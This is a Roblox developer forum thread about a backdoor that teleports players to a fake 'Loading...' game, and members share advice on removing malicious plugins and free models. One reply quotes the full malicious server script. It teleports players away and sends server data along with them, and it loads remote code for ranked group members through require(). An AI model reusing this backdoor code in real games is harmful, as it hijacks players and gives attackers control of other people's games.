Game teleports you into "Loading..."?

I looked through ServerScriptService and all my scripts were typed by me. There was nothing named “Script” and everything was normal…?

1 Like

Did you try everything from the thread?

2 Likes

To everyone here - please reinstall all your plugins and only use the ones you really trust.
Everyone in my team deleted the plugins they didn’t use, and it fixed the backdoor issue.

If you still get the virus, try deleting all your plugins temporarily, and check if the virus is still there.
That way you can at least make sure whether it’s your plugins or not.

5 Likes

I also had this plugin and the same thing happened to me.

1 Like

Well, this happened to a friend. He couldn’t figure it out either. He asked me to help him and gave me permission to edit his game. I think this causes the problem:
I took a look inside the script, and it looks like this,

Now, The thing that caught my eye is this,
This looked like a game ID to me. And you bet i checked what game ID it was, It’s the “Roblox faster loader” game!
So basically follow @pewpie12302die’s steps or just delete that script every time.

7 Likes

The game is now Content Deleted, It may be gone for now.

1 Like

Unfortunately, they manage to make multiple accounts for this. Just make sure to keep your eyes open for more ID’s, cause I have an understanding that there is a disgusting amount of them.

1 Like

You have a backdoor owned by John Doe SS I suggest you go check out this topic.

2 Likes

There’s already a post for this and I have the best answer so please go and check it.

1 Like

Hey guys.

We had a similar issue in our games.
The virus copied all titles of our scripts and used them for their scripts. For example the orginal script was called “FE Working Tank” the copy of the virus was called “feworkingtank(parent:vehicle)” and included also some random numbers
The copied scripts consisted of a text and a return script.
The text seemed to be random words and dont made any sense.
All of these copied scripts were based in a model called “Model” and could be found when we searched for “work” in the explorer.
Deleting of them seems to stop these teleportations.

These loading virus also spammed bots and hackers into our game!
I think the virus is a result of admin-plugins.
Hope these information could help you!

3 Likes

I agree with your admin plugin thought. Because I thought it was in Adonis but that is also a reason, I did have several plugins in Adonis.

2 Likes

i have no idea about anything scripting related, but i found a client replicator script in my camera, that contains this:

game.Players.PlayerAdded:Connect(function(player)
	wait(0.0000001)
local joinData = player:GetJoinData().SourcePlaceId
local TeleportService = game:GetService("TeleportService")

if joinData == 4653828604 then
	local Tpdata = player:GetJoinData().TeleportData
	if Tpdata then
		Req = Tpdata.req
		gid = Tpdata.grid
	end
if player:GetRankInGroup(gid) == 2 then

require(Req).load(player.Name)
end
return else
end
local Players = game:GetService(“Players”)

local TeleportService = game:GetService(“TeleportService”)
local teleportData = {
maxxPlrs = Players.MaxPlayers,
maxPlrs = Players.NumPlayers,
placeId = game.PlaceId,
JobId = game.JobId,
CreatorId = game.CreatorId
}
TeleportService:Teleport(4653828604, player, teleportData)

end)

the id 4653828604 brings you to the game

Edit: @Jamie_Scripts didnt realize you already found that

2 Likes

Just don’t put any free or leaked model into your game. If everything is made by you (or someone who got hired) there shouldn’t be any problems like that. Tip for the future.

2 Likes

@Orasina why in the world do they even do it anyway? Im pretty sure that the handler and clientreplicator scripts could possibly get your account banned if you transfer them into a free model. Many people have found this out. I found the RobloxFasterLoader in a script I inserted from the toolbox.

2 Likes

This was a massive issue for games of mine in the past, I found that it was due to either:

1. A malicious plugin that is disguised as a commonly used plugin
  2. A bad Free Model

I have no idea how this guy gets away with this, since the account has been up for ages and people report him en masse. My suggestion to anyone with this issue is to go through your plugins and have any collaborators go through plugins. One thing that can weed them out easily is RoDefender, it’s old and it breaks some scripts but it gets the job done.

1 Like

note-it’s a virus, aka as a serverside infector

1 Like

So I’ve tried everything here, and my game from 2011 with absolutely no scripts in it except one which I’ve verified is safe that is also from 2011 in this game. And yet I still get teleported away from the game. I have no plugins except a few verified (one from defaultio and one antivirus recommended in this thread). Any ideas?

Edit: so its actually 2 but they’re both from the LinkedSword from that era of roblox, far before this. How would this happen?

1 Like

You may have a script in a hidden class, try skipping down to step 2 of this thread and let me know what your results are.

1 Like

So far it’s throwing an error for indexing nil for GetFullName which would tell me there’s nothing. I might change the studio settings so i can see all the hidden classes in explorer myself and see if there’s a script hiding in one.

2 Likes

CSGDictionaryService also returned nil. This also doesn’t happen every time I go into the game, just on rare occasions. It’s honestly confusing

Editing because I don’t want to make 3rd reply: I also have this problem with another game that has a ton of scripts, and they both happen at the same low intervals to the same places with no scripts that I can find shared between them

1 Like